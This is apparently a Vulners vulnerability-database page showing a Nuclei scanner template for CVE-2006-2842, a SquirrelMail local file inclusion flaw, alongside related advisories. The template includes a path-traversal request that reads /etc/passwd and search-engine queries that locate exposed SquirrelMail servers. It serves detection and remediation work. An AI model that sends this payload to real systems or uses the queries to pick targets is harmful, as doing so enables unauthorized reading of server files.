Vulners
Lucene search
Squirrelmail <=1.4.6 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | SquirrelMail < 1.4.8 Local File Inclusion | 2 Jun 200600:00 | – | nessus |
| CentOS 3 / 4 : squirrelmail (CESA-2006:0547) | 5 Jul 200600:00 | – | nessus |
| Fedora Core 4 : squirrelmail-1.4.6-7.fc4 (2006-668) | 17 Jan 200700:00 | – | nessus |
| Fedora Core 5 : squirrelmail-1.4.6-7.fc5 (2006-680) | 17 Jan 200700:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Update 2007-007) | 2 Aug 200700:00 | – | nessus |
| RHEL 3 / 4 : squirrelmail (RHSA-2006:0547) | 4 Jul 200600:00 | – | nessus |
| SquirrelMail plugin.php plugins Parameter Local File Inclusion | 3 Jun 200600:00 | – | nessus |
| openSUSE 10 Security Update : squirrelmail (squirrelmail-1837) | 17 Oct 200700:00 | – | nessus |
 | squirrelmail security update | 3 Jul 200617:43 | – | centos |
 | CVE-2006-2842 | 6 Jun 200620:03 | – | cve |
10
id: CVE-2006-2842
info:
name: Squirrelmail <=1.4.6 - Local File Inclusion
author: dhiyaneshDk
severity: high
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
- ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2006-2842
cwe-id: CWE-22
epss-score: 0.46565
epss-percentile: 0.98672
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: squirrelmail
product: squirrelmail
shodan-query:
- http.title:"squirrelmail"
- cpe:"cpe:2.3:a:squirrelmail:squirrelmail"
fofa-query: title="squirrelmail"
google-query: intitle:"squirrelmail"
tags: cve,cve2006,lfi,squirrelmail,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 490a00463044022023d299eb9f4fbbf32b2ed67aa5f6cac4ddb91a87b0e8447e939d82b535c1fcfa02205d2ce2899915fc179ce87ce4cc13ff3ec1f05b5dcbec608247a15721029d6224:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 27.5
EPSS0.46565